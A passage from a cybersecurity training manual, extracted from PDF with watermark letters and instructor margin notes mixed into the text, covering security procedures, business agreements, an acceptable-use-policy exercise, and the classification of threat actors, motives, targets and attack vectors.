parameters for what is and is not acceptable to discuss. It also helps make
communication easier by providing clear paths for escalation.
Types of Procedures
The following table includes examples of common security procedures found in many organizations. Types of Procedures
Procedure Description
e
to production systems, ensuring that the changes in software do not
ut
impact operations in a negative way.
Compensating A compensating control is a security measure put into place to mitigate
control development
ib
a risk when a primary security control fails or cannot completely meet
expectations. For example, a primary control may be that a host generates
an alert to an administrator when it detects suspicious behavior, like
tr
repeated failed login attempts. However, there is the possibility that the
alert won't reach the administrator for whatever reason or that the host
is
won't alert on the action at all. Manually reviewing logs like syslogs/event
logs, authentication logs, and firewall logs is therefore a compensating
control because a human being may be able to spot suspicious behavior
D
that the automated system failed to see.
You can also develop compensating controls to support primary controls,
or
not just to replace them when necessary. For example, engaging in data
analytics can help strengthen an existing tool or system. Security
personnel can perform trend analysis and historical analysis to predict
future behaviors that a static tool might not be able to, and personnel can
e
also aggregate and correlate data to supply that tool with a more complete
perspective of events.
at
Control testing Just like testing patches, organizations may need to outline procedures for
procedures testing planned or existing security controls. These procedures must test
lic
the control's efficacy at reducing risk, and weigh that against its cost.
Control testing procedures are best performed not just once, but
continuously, so that you can identify when the control is lagging behind
up
planning the organization, there should be a plan in place to remediate these issues.
Remediation plans typically include steps to remove or suspend a system
from production while the error is corrected; this must be done in a way
ot
Procedure Description
Exception In this context, an exception is any circumstance that makes it difficult
management for an organization to carry out standard remediation procedures. As an
example, an organization may have legacy software that is integral to
business operations. A security assessment identifies several
vulnerabilities in the application programming interfaces (APIs) and
libraries it uses. Normally, the corrective action would just be to update
these APIs and libraries, but this will essentially break the legacy
e
application. Rewriting code in the legacy application to make it work with
these updates isn't entirely feasible, either. This is an exception to the
ut
remediation process.
Strong exception management procedures will anticipate issues like this,
ib
and will instruct personnel as to the best course of action. In the
aforementioned example, security personnel will need a plan in place to
inform higher-level decision makers as to their choices: either accept the
tr
risk or scrap the legacy application and look for a new solution. The
exception management plan may also provide security personnel with
is
compensating controls that don't quite mitigate the risk, but at least
reduce it somewhat or transfer it elsewhere.
D
Evidence production To support the forensic investigation process when it is needed after a
security incident, the organization should develop procedures for
collecting and producing evidence. Depending on the circumstances of
or
the incident, this evidence may be kept internal, but it also may need to be
presented to a third-party legal entity. Procedures should ensure the
evidence upholds integrity and is authenticated at every step of the
process, so that its relevance and accuracy cannot be called into question.
e
at
There are several common types of business documents an information assurance professional Business Documents
should expect to encounter in their normal duties. Many of these focus on business partnerships, That Support Security
alliances, and vendor contracts. Since all organizations do business with other entities, there are Initiatives
up
many types of common agreements used to govern those relationships. Some of these agreements
specifically deal with security and risk management, whereas others may incorporate them
secondarily or not at all.
D
Document Description
Master service Lays the groundwork for any future business documents that two parties
ot
agreement (MSA) may agree to. The purpose of an MSA is to expedite the agreement
process as the relationship between each business partner grows.
Organizations may use an MSA to eliminate redundancies that arise when
N
applicability (SOA) purpose. As SOAs identify why a particular control is being used, they are
D
Document Description
Business impact Identifies present organizational risks and determines the impact to
analysis (BIA) ongoing, business-critical operations and processes if such risks actually
occur. BIAs contain vulnerability assessments and evaluations to
determine risks and their impact. BIAs should include all phases of the
business to ensure a strong business continuation strategy.
Interoperability General term for any document that outlines a business partnership or
agreement (IA) collaboration in which all entities exchange some resources while working
e
together.
ut
Interconnection Geared toward the information systems of partnered entities to ensure
security agreement the use of inter-organizational technology meets a certain security
(ISA) standard for CIA. Because they focus heavily on security, ISAs are often
ib
written to be legally binding. ISAs can also support MOUs (see next
entry) to increase their security viability. NIST provides Special
tr
Publication 800-47 for developing an interconnection plan, titled Managing
the Security of Information Exchanges.
is
Memorandum of Usually not legally binding and typically does not involve the exchange of
understanding money. MOUs are less formal than traditional contracts, but still have a
D
(MOU) certain degree of significance to all parties involved. They are typically
enacted as a way to express a desire for all parties to achieve the same
goal in the agreed-upon manner. An MOU document might contain
or
background information on each organization; the history of the
relationship between the two organizations and circumstances that led to
the partnership; and a general or specific timeline for collaborative
business activities. Because they typically have no legal foundation,
e
MOUs are not the most secure agreement for a partnership.
at
Service-level Clearly defines what services are to be provided to the client, and what
agreement (SLA) support, if any, will be provided. Services may include everything from
hardware and software to human resources. A strong SLA will outline
lic
NDAs also commonly state in which cases, if any, data may be used or
processed by the receiving entity. For data acquired through public
sources, an NDA is not enforceable.
N
Business partnership Defines how a partnership between business entities will be conducted,
agreement (BPA) and what exactly is expected of each entity in terms of services, finances,
o
and security. For security purposes, BPAs should describe exactly what
the partners are willing to share with each other, and how any inter-
D
Note: Certain documents, particularly those used in vendor agreements, may require the client
organization to fill out a questionnaire in order for the vendor to ascertain various information
about the client's current status and its needs.
e
Follow these guidelines to integrate documentation into your risk management strategies. Guidelines for
ut
Integrating
Integrate Documentation into Risk Management Documentation into Risk
Management
When integrating documentation into your risk management strategies:
ib
• Download free policy templates to make crafting a policy easier.
• Consider hiring a consultant if your organization can't support the internal development of
tr
policies.
• Use direct, concise language and dispense with legal jargon in policies.
is
• Include business leaders in policy development and make sure executive management approves
the policy before it is enforced.
D
• Support policies with clearly defined processes and procedures.
• Make processes and procedures easy to follow and tailor them toward your audience's technical
aptitude.
or
• Compare and contrast policies, processes, and procedures with those of other organizations.
• Consider policies, processes, and procedures to be living documents; that is, subject to change as
businesses and technology evolve.
e
• Incorporate best practices like job rotation, mandatory vacations, and user training into your
policies based on your specific organizational requirements.
at
• Involve HR, legal counsel, management, and other entities in the policy development process to
get unique perspectives.
lic
• Ensure that policies have provisions for legal and regulatory compliance.
• Identify any sensitive PII your organization handles.
• Be up front with your clients as to how their PII will be used and for what purpose it will be
up
used.
• Advise your clients on best practices to maintain privacy.
• Identify the various business documents and agreements applicable to your organization's needs.
• Use an agreement like an SLA in any partnership that requires strong security and legal and
D
financial liability.
ot
N
o
D
ACTIVITY 1-4
Integrating Documentation into Risk
Management
e
Data File
ut
C:\CNX0013Data\Assessing Cybersecurity Risk\dtech_aup_v1.docx
Activity: Integrating
ib
Documentation into Risk Before You Begin
Management
You have a Microsoft Windows® 10 computer to complete some of the activities in this course.
Make sure that you give
This client is a domain member in develetech.internal. You also have a Windows Server 2019
tr
students their assigned
numbers for the class.
computer running as a domain controller.
is
Steps in this activity will Note: Activities may vary slightly if the software vendor has issued digital updates. Your
vary if a word processing instructor will notify you of any changes.
program other than
D
LibreOffice Writer is
used. Scenario
This is one example of a
On more than one occasion, unknown and unauthorized users have tricked Develetech's help desk
security policy template.
You may choose a
different policy for
students to fill out. Time
or
employees into divulging sensitive information and exposing their workstations and the network to
malicious activity. For example, users have been sending the help desk emails enticing the employees
to click on links to malicious websites. These sites execute scripts on the employees' computers that
e
permitting, have make their systems sluggish and unresponsive. Additionally, some malicious users have been
students fill out multiple contacting help desk employees through their private Facebook and Skype® accounts. The
at
policies. employees have been implicitly trusting anyone with knowledge of these accounts, giving away
Notify students of any sensitive company information over unauthorized communication channels.
changes to activities
lic
c) Navigate to https://www.sans.org/information-security-policy/.
d) Under the Filters section, check the General check box.
o
D
e) Verify that there are several general security policy templates available.
e
ut
ib
tr
is
D
or
f) Select any of the template options to see more information about the template.
There is a description of the template, as well as links to its PDF or DOC file.
g) Select one or two of the other general security templates that interest you. Change the filter to view
e
templates in other categories.
at
\LibreOfficePortable.
access.
e
ut
ib
tr
is
D
or
e
3. Review the overview and purpose of the policy and verify that it outlines both
acceptable and unacceptable behavior for all users to protect the organization
at
4. Scroll down to section 4.3 and review the unacceptable use policy items.
accounts. You can also take a more positive approach by outlining acceptable behavior when it
comes to the content of a help desk request; for example, the information that should be included
in an email request so that it's both useful to the help desk employee and secure at the same
ot
time. Likewise, you can encourage or mandate email encryption to provide some measure of
authentication and confidentiality in all such requests.
N
liking. 8. Use of unauthorized communication channels to contact help desk staff, including, but not limited
to, private Facebook and Skype accounts.
If necessary, help
students with formatting,
but make sure they don't 7. Add your revision to the revision history.
get bogged down by a) Scroll down to the Revision History section and examine the table.
trying to make the
b) In the second row, in the Date of Change column, type today's date.
document look as
appealing as possible. c) In the Responsible column, type your name.
d) In the Summary of Change column, type Added item 8 to email and communication activities.
e
ut
ib
e) Save the document to the desktop as dtech_aup_v2.docx
f) When prompted to confirm the file format, select Use Word 2007–365 Format.
tr
8. Why is it important to maintain a revision history in policies like this one?
is
A: Answers may vary, but security policies, procedures, and processes are living documents. This
means that, in the event of newly identified threats or vulnerabilities, you can adjust the document
accordingly. Documents that cannot keep up with ever-shifting organizational risk factors are
D
unhelpful to their intended audience. Recording a revision history will ensure there is a trail of
changes and that each change is known in the context of when it was made, and that the
person(s) who made the changes are held accountable.
Summary
In this lesson, you identified why the risk management process is important, and went through the
process by assessing and mitigating risk across a wide range of factors. You also reinforced your risk
management strategy through documentation. The information you learned in this lesson will give
you a foundation for understanding and applying security in your organization.
Encourage students to
At your workplace or one you're familiar with, what security risks are there, and
e
use the social
networking tools what risks do you envision for the future of the organization?
ut
provided on the CHOICE A: Answers will vary. Depending on the industry, the information they work with, and the business they
Course screen to follow do, students may see risk to an organization's finances, physical assets, intellectual property,
up with their peers after
reputation, legal compliance, and other factors. Depending on how they envision their organization
ib
the course is completed
evolving, students may anticipate new risk, additional risk in the same category, or even less risk.
for further discussion
and resources to support
What sort of documentation do you have in your organization or an organization
tr
continued learning.
you're familiar with to support risk management? What other documentation
should there be?
is
A: Answers will vary. Some students will have policies regarding information storage, network usage,
employee awareness and training, and legal compliance. They may also have individual procedures
D
for security personnel and employees to follow in order to enforce security. If students' organizations
are in a partnership or are looking to develop such a relationship, they should also consider drafting
agreement documentation, like an ISA.
or
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
e
resources for a more continuous learning experience.
at
lic
up
D
ot
N
o
D
e
ut
Lesson Time: 1 hour, 50 minutes
ib
tr
is
Lesson Introduction
D
Now that you have a foundational understanding of the importance of risk management,
you're ready to begin meeting security problems head-on. You need to figure out just what
or
and who it is you're up against as you defend your organization from harm. The threat
landscape is huge, diverse, and most important of all, ever-changing. By analyzing the very
nature of threats to your organization, you can obtain crucial knowledge to aid in the active
defense of your computing and network environments.
e
at
Lesson Objectives
lic
• Analyze current trends in security and how they affect the organization's security
posture.
D
ot
N
o
D
TOPIC A
Classify Threats
Part of any solid defense is understanding your opposition. As a cybersecurity practitioner, you'll
need to get into the minds of those that threaten your organization. In doing so, you'll start to see
patterns of behavior you can anticipate. You'll subsequently be able to save yourself time, effort, and
e
resources in protecting your assets.
ut
Threat Actors
ib
Threat Actors An attacker is also known as a threat actor. It's important not to think of threat actors as some
Consider demonstrating faceless, monolithic entity; on the contrary, they are as diverse as their targets. Threat actors have
various methods of operation, motivations, and intentions. When you understand who is attacking
tr
real-world examples of
threat actors by using a you, why, and how, it'll be easier for you to implement the correct actions to oppose these threats.
security blog such as Thinking of all attackers as the same will only keep you ignorant, and the more ignorant you are of
is
Krebs on Security. the threat landscape, the greater disservice you do to the security of your organization.
Also keep in mind that these days, most attacks (particularly high-profile attacks) are carried out by
D
groups of people. So, the term "threat actor" can refer to multiple people working in concert instead
of just a single person working alone.
Threat Actor
Insiders
Description
or
To begin with, it can be helpful to categorize threat actors as in the following table.
e
An insider is any attacker who has or had a close business relationship
with their target. Current employees may abuse their access and privileges
at
trust. In many cases, insiders are more common culprits and are more
successful than external actors.
Script kiddies
D
Script kiddies are inexperienced, unskilled attackers that use tools and
scripts created by others. The term is primarily derogatory and used to
criticize an attacker as having childish motives with a limited appreciation
ot
however, with the right tools, they can still cause a great deal of damage.
This is especially true considering how easy it is to acquire freely available
attack tools from the Internet. Nevertheless, script kiddies are more likely
o
e
or challenge to be bested. However, this also means that they are repeat
ut
offenders, and take progressively greater risks.
Professional hackers Professional hackers are paid by some entity to do a job, and as such, they
are typically more skilled and devoted to their craft than most recreational
ib
hackers or script kiddies.
Like recreational hackers, not all professional hackers are malicious;
tr
indeed, many are employed by organizations to conduct penetration tests
for the purpose of evaluating the organizations' security. The malicious
is
variety, however, are usually paid by competing organizations to attack
their rivals, or by disgruntled individuals who have a grudge against an
D
organization but do not themselves possess the required level of hacking
skill. Professional hackers are a significant threat that should not be taken
lightly.
Cybercriminals
or
Like professional hackers, cybercriminals receive money for a job; but
rather than being paid by a third party, they typically steal money from
their target during the attack itself. Cybercriminals can have varying levels
e
of expertise, but the truly successful ones that evade detection are
technically skilled.
at
hackers order to conduct a wide range of attacks. The hackers these countries
D
employ are almost always skilled and may even have access to powerful
tools and resources that a typical professional hacker does not. State-
sponsored hackers engage in espionage, sabotage, censorship, and more
—all of which can be aimed at both external and internal targets.
e
ut
Threat Motives
ib
Threat Motives Each threat actor will have one or more overarching reasons for conducting an attack on your
systems. The different types of actors you encountered in the previous table may be more
predisposed to one type of motive over another, but it can still be difficult to pin down why a
tr
person or group of people are targeting your organization. When you understand how certain
motives influence other dimensions of an attack, you begin to more clearly see why it's an essential
is
piece of information. For example, an attacker who is motivated by revenge may be more emotional
and reckless in their behavior, giving you a greater chance of catching them in a mistake. On the
other hand, a dispassionate attacker simply looking to steal sensitive information may be more
D
predictable based on certain logical patterns.
The following table lists some of the most common threat motives in cybersecurity.
Threat Motive
trade secrets to then turn this information around and sell to the highest
bidder. Just because an attack doesn't appear immediately profitable, that
doesn't mean it can't be in the long run.
Attackers who desire financial gain are typically more rational and
D
e
Some aren't seeking acceptance in a particular community, but simply
ut
want to be seen as a dangerous or interesting person by anyone and
everyone. Like those that desire power, attackers motivated by reputation
may act carelessly and with little regard to discretion.
ib
Association/affiliation Similar to those that seek recognition, an attacker may also seek inclusion
in a group simply to be part of something greater than themselves. This is
tr
often the case when it comes to hacktivists, cyberterrorists, and state-
sponsored hackers—essentially, anyone with an overriding political or
is
social cause. The attacker identifies very closely with the ideals of the
community they've allied with, and may see themselves as merely an
extension of those ideals.
D
Despite being motivated for less selfish reasons, this type of attacker may
still exhibit behavior that is more emotional than logical. At the same
attention to themselves.
or
time, this affiliation enables them to be more anonymous and draw less
Fun/thrill/exploration Rather than any particularly dramatic reason, some people simply attack
e
systems because it's fun to them. This may be based on some sort of
perceived challenge, or it could be a way for them to develop their skills
at
Attackers with this motivation are therefore usually less dangerous than
the others, and they may not even be malicious at all. Nevertheless, they
can still inadvertently cause harm to the organization, and you should
up
emotional. On one hand, this could prompt the threat actor to be more
destructive than someone motivated by other reasons; on the other hand,
the threat actor is likely to be reckless and may make significant mistakes
o
Human Error
Although not a motive per se, human error can still be the reason for an attack. In some cases, a
threat actor may become a threat actor purely by accident. An end user may click the wrong link and
open their workstation up to malicious software; a system administrator may execute the wrong
command during a standard recovery test and may end up taking down more systems than they
should have; a network administrator may configure a wireless access point (WAP) improperly,
inviting unauthorized users to connect to the network; and so on.
Threat Intentions
Threat Intentions Just as the motivations of threat actors differ, so too do their ultimate goals. Knowing exactly what
Consider mentioning an attacker is after can help you decide who and what to protect. It can also help you recognize
that motives and intents attack patterns that you can use to anticipate and mitigate the effects of an attack. Intentions are
often align, though this is almost always an extension of motives; if you know why someone is prepared to attack you, you will
e
not always the case. For have an easier time identifying what they'll actually do. Analyzing both in the same context can
example, someone
ut
provide you with valuable insight into the minds of the threat actors that target your organization.
might intend to steal
from an organization and The following table lists some of the most common intentions of threat actors.
have a primary motive of
ib
revenge, not necessarily Threat Intention Description
a desire for money.
Theft Theft is the most common goal for threat actors that desire money. In the
tr
world of computers, the most lucrative item is information. Thieves look
to steal credit card and financial information, personally identifiable
is
information (PII), or any piece of data that may enrich the attacker while
robbing the victim of money, credibility, market position, and many other
D
necessary components of business.
Thieves may be more inclined to target high-profile information, like your
customers' private data, or they may prefer more subtle targets that are
or
less likely to call attention to themselves. In either case, theft is the most
popular and often the most devastating goal of a cyber attacker. A
business that has its bottom line compromised may not be able to
recover.
e
Espionage Espionage tends to come in two types: state sponsored and industrial.
at
The former is typically carried out by hackers that are in the employ of a
government, and their targets can range from internal (its own citizens) to
lic
A trade secret, like the technical details of a developing product, can cost
an organization time and money if a competitor is able to capitalize on
this information and beat them to the market. Likewise, a nation that
spies on another may be able to glean its military or economic plans,
D
will spread information that may either be true or false that the
organization or individual doesn't want public, which could cost the
organization its reputation or the individual their job.
o
Either of these scenarios will weaken the target and may provide an
D
e
media to expose correspondence that might put the victim in a bad light.
ut
Likewise, the attacker can also threaten to release financial records that
indicate impropriety within the organization (such as tax evasion).
Extortion is related to blackmail, but instead of threatening to release
ib
incriminating information, an extortionist attempts to coerce their victim
into doing something favorable for the attacker under the threat of
violence, destruction of property, or some other malicious act. A
tr
common example in the world of cybersecurity is ransomware that
threatens to destroy critical data unless the victim pays the attacker.
is
Hacktivism/political A hacktivist's goal is more often than not to raise awareness of the cause
D
they are fighting for, and similarly, to take part in a kind of vigilante
justice. Because of the Internet's open and unrestricted origins, many
hacktivists target individuals or organizations who they perceive as a
or
detriment to government transparency, freedom of expression, an open
source philosophy, and other ideals of a democratic society. However,
threat actors from different cultures with vastly different beliefs may, by
contrast, attack organizations that do uphold these ideals.
e
Either way, hacktivists most commonly seek to initiate denial of service
at
(DoS) attacks and humiliation of their victims. Hacktivists are also known
to engage in doxing, which is the practice of publishing PII about
individuals online.
lic
Threat Targets
To achieve their goals, threat actors need to attack specific resources. These resources are often
o
Threat Targets
technical in nature, but can also include human resources. Identifying these resources, how they
D
might be threatened, and who might threaten them, is an important step in the profiling process.
You'll become better prepared to defend these targets and mitigate attacks against them.
The following table lists some of the most common targets of threats.
Individuals Threat actors can target individuals for a variety of reasons, depending on
various factors associated with that individual victim. For example,
attackers will often direct phishing attempts at particularly wealthy
individuals to obtain a huge payout—a process called whaling. Even non-
wealthy individuals may be the target of identity theft, in which a threat
actor exploits a victim's credit and other financial information for their
own gain.
e
Monetary gain is not the only reason why an individual may become a
ut
target. A threat actor may take revenge against a specific person for a
perceived wrong. Likewise, some threat actors may target individuals
based on their sociopolitical affiliation.
ib
Corporations Corporations maintain a great deal of assets, and the nature of big
business makes corporations the primary target for threat actors
tr
interested in monetary gain. Nevertheless, a threat actor may wish to
instead tarnish the corporation's brand as part of a hacktivist campaign or
is
sabotage by a competitor. Competitors may also take a more subtle
approach and engage in espionage against other corporations to glean
certain trade secrets.
D
Non-profit associations Unlike corporations, non-profit associations are not commonly targeted
by threat actors looking for money. However, non-profits still need to
or
manage money to keep operations afloat, so a threat actor may still see an
opportunity there. It's more likely a threat actor will target a non-profit
because of sociopolitical reasons, especially since non-profits typically
push for some sort of social cause a threat actor may take exception to.
e
In order to keep operational costs as low as possible, non-profits may be
at
much more lax about security than a profit-motivated corporation is. This
could provide threat actors with a more attractive target, even if the effect
of their attack is smaller in magnitude.
lic
Governments Governments, especially those in first-world nations, are usually the most
daunting targets. They tend to have the most rigorous security standards
up
operations.
Critical infrastructure Critical infrastructure refers to resources that, if damaged or destroyed,
N
e
and can enable a threat actor to exploit an individual's privacy or an
ut
organization's data.
• Programmable logic controllers (PLCs), which are the components
that directly control industrial control systems (ICSs), often as part of
ib
a supervisory control and data acquisition (SCADA) system.
tr
Attack Vectors
is
An attack vector is the method that an attack takes. In other words, the attack itself is executed Attack Vectors
along a certain path—that path is the vector. Different vectors may enable different outcomes in the
D
attack. Likewise, different motivations and goals may prompt an attacker to take different vectors.
One vector may be more desirable to an attacker because it is less secure, whereas others may be
more well-defended by the organization, and thus less attractive to attackers. Understanding the
or
vectors that attackers take is a crucial step in cybersecurity because it helps the practitioner identify
the how of an attack. When you analyze how attacks are possible within the context of your
organization as well as with external forces, you can more easily stop or prevent incidents entirely.
Although the paths that attackers take are diverse, there are three general elements that can
e
contribute to an attack vector:
at
• Vulnerabilities: Attackers will almost always search for holes within your systems and networks.
Any gaps in security they find are potential vectors of an attack, simply because the attack is
likely to be easier and more successful than if they take a path of greater resistance. Why break
lic
down a wall to get access to a room when the back door is open?
• Exploits: These almost always depend on vulnerabilities to be effective. When the gap in
security is identified, the attacker can launch a tool or utility to take advantage of that gap.
up
Exploits themselves are often programs that carry payloads—the payloads carry the main portion
of the exploit. These payloads can be customized by the attacker to suit their preferences, as well
as to be more effective in a certain context or environment.
D
• Techniques: An attack's technique provides more detail about the path it takes, as well as how it
operates. It can also help categorize the effects of an exploit payload. There may be several
different ways to launch a successful attack on a system or network, but an attacker can choose
ot
one over another for various reasons. The most common reason is efficiency, but escaping
notice is also an important factor.
N
As mentioned before, attackers can choose different techniques based on factors such as ease, Attack Technique
effectiveness, and concealment. These factors will influence which paths the attacker takes and how Criteria
D
they go about using an exploit. The following are general criteria that cover most attack techniques:
• Targeted vs. non-targeted: Attackers won't necessarily choose specific targets, but may instead
cast a wide net to catch as many potential victims and vulnerabilities as possible. In some
circumstances, this can make an attack more effective, as there are plenty of fallbacks in case one
target doesn't give way to the attack. However, attackers may still prefer the more focused
technique of attacking a single target. They can dedicate all of their time and effort into one
scenario, making it as effective as possible. It's also easier to cover one's tracks when there isn't
much to cover in the first place.
• Direct vs. indirect: To attack targets directly, an attacker usually exploits some technical flaw in
a system or network. They are then able to cause damage or exfiltrate information, whatever
their goal may be, by engaging with the target. Depending on the skill of the attacker and the
state of the target's defenses, this can be relatively quick, easy, and produce instant results.
However, this is not always feasible. Attackers who take an indirect approach do so by being
patient and manipulative. For example, a direct attack on a customer's PII could involve
breaching the network and copying the database the information resides on. In an indirect attack,
e
the attacker could impersonate a customer and socially engineer a customer service
representative into releasing this PII.
ut
• Stealth vs. non-stealth: A huge concern of most attackers is being detected—not just during
the attack itself, but after, when traces of the attack may still remain for a forensics team to
ib
identify. Stealth techniques, like introducing Trojan horse malware that acts as a man-in-the-
middle during network communications, can go undetected for a long time, as they do not
necessarily show overt signs of compromise. As useful as this sounds to an attacker, some avoid
tr
the stealthy route and actually intend to make as much noise as possible. Non-stealth attacks are
often detected easily, but can cause panic and confusion, especially among unseasoned
is
personnel. They can also be used as a form of misdirection—if the security team is tied up
responding to an overt attack, the attacker may find it easier to gain access using other means.
D
• Client-side vs. server-side: This technique criterion is most often enacted when the target is a
website, web app, or some other web-based service. Server-side attacks attempt to compromise
the computer systems that serve data to clients so they end up serving harmful data or no data at
or
all. Successfully compromising a server can have a wide range of effect, as any client that
attempts to connect to that server may be exposed to malicious activity. However, businesses
that run servers, especially large corporations, are much more likely to harden these servers
against attacks, so an attacker may be dissuaded from taking this path. On the other end, average
e
users don't exercise that same high level of security, so their role as a client becomes an attractive
target for attackers. An attack may have much less reach if only one client's browser is
at
compromised, but this could be all the attacker needs to cause a good deal of harm.
Note: These four criteria are not mutually exclusive, and attackers often blend them together
lic
Threat Profiles
Threat Profiles All of the threat components you've seen thus far—actor types, motives, intentions, targets, vectors,
and techniques—can be combined into a single threat profile. Compiling all of these characteristics
D
into a single profile will greatly assist your prevention, mitigation, and response techniques should
the threat actualize. This is because your defense strategies will need to be adjusted based on the
threat's nature—and because there are many dimensions to a threat, being able to describe them
ot
accurately in words will ensure that no crucial information is missing or in the wrong context.
N
o
D
e
ut
ib
tr
Figure 2-1: A basic example of a threat profile.
is
Guidelines for Classifying Threats
D
Guidelines for
Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the Classifying Threats
CHOICE Course screen.
Classify Threats
or
e
When classifying threats:
at
• Recognize the type of threat actors that are out there, as well as their skill level and mental
process.
lic
• Analyze the different motives of attackers and how these motives can affect an attack.
• Identify threat intentions to discover exactly what an attacker is after.
• Identify how certain entities and assets may become the target(s) of a threat.
up
• Understand how vulnerabilities, exploits, and techniques are part of the path that attackers take
to compromise systems and networks.
• Categorize threat techniques into different criteria to study their effect.
• Combine the characteristics of a threat into a complete threat profile.
D
ot
N
o
D
ACTIVITY 2-1
Constructing a Threat Profile
Scenario
e
You're a cybersecurity analyst for Develetech. As part of your job, you evaluate the company's assets
to identify gaps in security that could lead to those assets being compromised. You've been called on
ut
to detail the potential threats to each of the company's major assets. This typically involves
constructing a thorough threat profile so that your colleagues in IT can make more well-informed
ib
decisions in regard to implementing security controls and strategies. At the moment, you've been
asked to create this threat profile based on Develetech's customer records database.
Activity: Constructing a
tr
Threat Profile
Consider leading this 1. Develetech's customer records database contains a variety of information
is
activity as a group
discussion. Students can
about its customers, including first and last name, phone number, physical
work together to address, place of employment, date of birth, and purchase history. Recall that
D
brainstorm ideas and Develetech is a large electronics manufacturer, and it sells products like smart
come to a consensus on
each component of the
TVs, smartwatches, virtual reality head-mounted displays (VR HMDs), 3D
threat profile. Fill in the
slide based on students'
responses.
Consider having
or
printers, and other technology on the rise.
What attack technique criteria do you envision threat actors are most likely to
use in order to compromise this database?
e
students construct two
A: Answers will vary. Depending on the strength of any in-place security controls, an attacker may be
different profiles based
at
inclined to launch a direct attack on the database. This is more likely to net the attacker access to
on the scenario
everything in the database; however, if they are only searching for specific information, they may
questions. At the end of
choose more indirect means. Because the database is likely to already be hardened against
the activity, ask them
lic
attack, attackers would probably opt to choose stealthy methods. This would ensure the attack
which profile they
remains undetected before damage is done, and it may help the attacker cover their tracks
believe is most accurate.
afterward. However, attackers interested more in causing damage and denial of service may forgo
The activity questions stealth to maximize their impact.
up
threat profile.
authentication packets as well as cause a database to dump its contents. Certain payloads can
Keep in mind that there also be injected into a database to passively monitor new entries or changes.
is not necessarily an
o
3. What do you believe are the most likely intentions an attacker has when it
comes to compromising the customer records database?
A: Answers will vary. Theft is probably the most common intention in this case. An attacker who is
able to steal these records can sell them on the black market or to one of Develetech's corporate
competitors. PII can be very useful to individuals and organizations looking to gain an advantage
over the company or its customers. Similarly, an attacker may be directly spying on Develetech on
behalf of one of its competitors to see where its new products are strongest and gain an edge in
the marketplace. More personal or idealistic intentions, such as revenge and activism, are less
likely; however, depending on the company's actions and its relationship with the public, an
e
attacker may seek to humiliate the company by exposing such a crucial asset to the world.
ut
4. What do you believe are the most likely motives an attacker has for
compromising the customer records database?
ib
A: Answers will vary. Assuming theft is the most likely intent, desire for money is the most likely
motive. An attacker can make a great deal of money selling PII. However, there are many other
possible motives: The attacker could have seen all of the recent data breaches in the news and
tr
chosen to make a name for themselves by emulating these breaches; the attacker may destroy
the database rather than copy it, demonstrating they have the power to do so; or the attacker may
is
simply breach the database because they wanted to see if they could, and not necessarily to
exfiltrate any data.
D
5. Using what you've determined for the previous questions, what type of threat
actor do you think is most likely to carry out a compromise of the customer
records database?
or
A: Answers will vary. It's unlikely that a script kiddie would even be able to breach such a high-profile
target. Likewise, there may not be much of a reason why a state-sponsored hacker would go after
an electronics manufacturer. More likely, the threat actor is either an insider or cybercriminal. For
e
the former, the threat actor already has significant access to their target, as well as extensive
knowledge an external user would not possess. This gives them a key advantage and can make
at
their theft or destruction of the database much easier to achieve. A cybercriminal will likely have
the requisite skill to break into the database from the outside, as they have probably made a
career out of stealing personal information.
lic
6. Based on your previous decisions, how would you describe the profile of the
most likely threat(s) to Develetech's customer records database?
up
A: Answers will vary depending on the answers to the previous questions, and you may believe that
multiple profiles are necessary. One example is as follows: The threat actor is likely an insider—
someone with knowledge of the database's structure, physical or logical location, and even its
D
credentials. The insider's motive is most likely a desire for money, as they know this database is
very valuable to identity thieves and corporate competitors. Rather than destroy the database or
deny service to it, the threat's intention is probably to copy the relevant data and exfiltrate it. The
ot
insider may take advantage of the database's poor authentication methods to access it, and may
use a code injection exploit to dump the database. The insider is likely somewhat technically
proficient if they've gotten to this point, so they will probably try a stealthy approach and remove
any traces that they have accessed the database.
N
o
D
TOPIC B
Analyze Trends Affecting Security Posture
Threats don't exist in a vacuum, and neither does cybersecurity as a practice. They evolve and follow
certain trends over time, just like technology and society in general. To stop these changes from
passing you by, you need to constantly stay up to date on the threat landscape and other factors that
e
dynamically affect security.
ut
Ongoing Trend Analysis
ib
Ongoing Trend Analysis To stay up to date on the current threat and vulnerability climate, it's absolutely vital you conduct
ongoing analysis of all areas with the potential to put your business at risk. The more informed you
are, the better equipped you will be to meet your organization's diverse business and operational
tr
needs.
is
An analysis of cybersecurity trends can reveal new flaws or other factors that will have an impact on
your organization's security posture. You can obtain trend data by conducting research into a variety
of resources, including vulnerability databases, security blogs, bug tracking websites, and so on. But
D
before you consult these resources, you should be aware of the best practices that guide good
research:
or
• Seek out industry-accepted and vetted sources for information, including major regulatory and
standards agencies like the National Institute of Standards and Technology (NIST) and ISACA.
• Exercise discretion with unverified sources or untested advice, and beware of social engineering
hoaxes.
e
• Don't settle for one source—corroborate information across several distinct sources.
at
• Conduct research across a spectrum of resources—i.e., don't limit yourself to just reading blogs.
lic
up
D
ot
N
o
D
e
ut
ib
tr
is
D
or
Figure 2-2: An example of a reputable security resource on the Internet.
e
After gathering trend data, you can apply that data to your systems wherever it is relevant. You'll
at
want to analyze key organizational resources like operating system logs, output from hardware and
software tools, and data, to determine what is affected by these trends and how. For example, a new
flaw in the Linux kernel will prompt you to identify your most sensitive systems running Linux, and
lic
then develop a plan of action for patching those systems (if such a patch is available) with minimal
disruption.
up
information assets are much more commonly attacked than others. These targets are especially Assets
attractive to attackers in our modern, interconnected world. The reasons are generally twofold: one,
these targets can lead to great payouts for the attacker, and consequently, significant damage to the
ot
victim(s); and two, because these targets have become so ubiquitous and essential to everyday life in
the developed world, securing them is a major challenge.
N
The following are some of the most popular targets in the current threat landscape:
• Computing and power resources: Computing assets are always a popular target because of
how crucial they are to any organization's infrastructure. They are the foundation on which all of
o
the proceeding assets are built and operated. If an attacker can compromise the foundation, then
they'll have an easy time compromising everything else. Similarly, computers depend on power to
D
function, and if an attacker can compromise power resources like electric generators, they can
cause major disruption and service outages for many organizations and citizens.
• Financial information: It's not hard to guess why an attacker would go after an individual's or
organization's financial information, but many people overlook how much easier it has become
for attackers to actually succeed in stealing money from victims. Everyone has a bank account,
and most people do their banking online—not to mention all of the credit card purchases they
make from online vendors. This makes it almost inevitable that enough people and companies
will mishandle their financial information for attackers to capitalize on.
• Account information: People sign up for so many disparate services online they end up with
more accounts than they can even remember. This causes people to be careless with their
